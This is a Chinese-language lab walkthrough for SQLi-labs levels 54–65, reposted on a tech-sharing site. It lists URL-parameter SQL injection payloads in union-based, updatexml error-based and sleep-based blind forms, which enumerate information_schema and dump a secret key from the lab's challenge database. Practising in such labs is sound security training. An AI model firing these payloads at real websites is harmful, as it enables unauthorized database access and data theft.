标签:schema name lib concat table lesson54 id select 65
LESS54
关卡要求:此挑战的目标是在不到10次的尝试中从数据库的随机表中转储(密钥 为了好玩,每次重置,挑战都会生成随机表名、列名和表数据。随时保持新鲜。
①判断列数(二分法)
输入:?id=1' order by 3--+
②当前数据库
输入:?id=-1' union select 1,2,database() --+
③查表
输入:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
9po9d7v0i2
④查字段
输入:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+
⑤查字段的值
输入:?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+
1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4
点击提交即可通过完毕。
把你这个愚蠢的黑客赶走!
LESS55
参数:(1)
次数:14次
LESS56
参数:(‘1’)
次数:14次
LESS57
参数:“1”
次数:14次
LESS58
次数:5次
这关不能使用 union select 没有返回回显位置。
我们使用报错注入。
①查表
数据库已知是challenges
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+
②查字段
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+
③查字段的值
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+
恭喜你成功了!
LESS59
参数 :id=1 无包裹
LESS60
参数:id=(“1”)
LESS61
参数:id=((‘1’))
LESS62
一共130次,显而易见盲注它来了!!
输入:?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+
改变它的值逐次判断即可。
LESS63
参数:‘1’
LESS64
参数:((1))
LESS65
参数:(“1”)
标签:schema,name,lib,concat,table,lesson54,id,select,65 来源: https://www.cnblogs.com/c1047509362/p/12512621.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。